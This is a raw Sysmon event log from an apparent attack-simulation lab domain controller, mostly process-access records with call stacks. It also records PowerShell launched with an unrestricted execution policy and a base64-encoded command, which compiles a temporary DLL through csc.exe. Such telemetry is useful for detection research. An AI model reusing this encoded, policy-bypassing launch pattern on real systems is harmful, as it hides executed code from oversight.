l+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8E20-6005-D002-00000000A201}42684384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES1511.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCA32CA1CCC6E04A50AB6294A1BC7C1AA5.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\t4kqsmcp.cmdline" 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CE02-00000000A201}37204528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c19a9|UNKNOWN(00007FFA402DB68F) 154100x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.078{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\t4kqsmcp.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\t4kqsmcp.cmdline2021-01-18 13:33:20.075 11241100x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\t4kqsmcp.dll2021-01-18 13:33:20.075 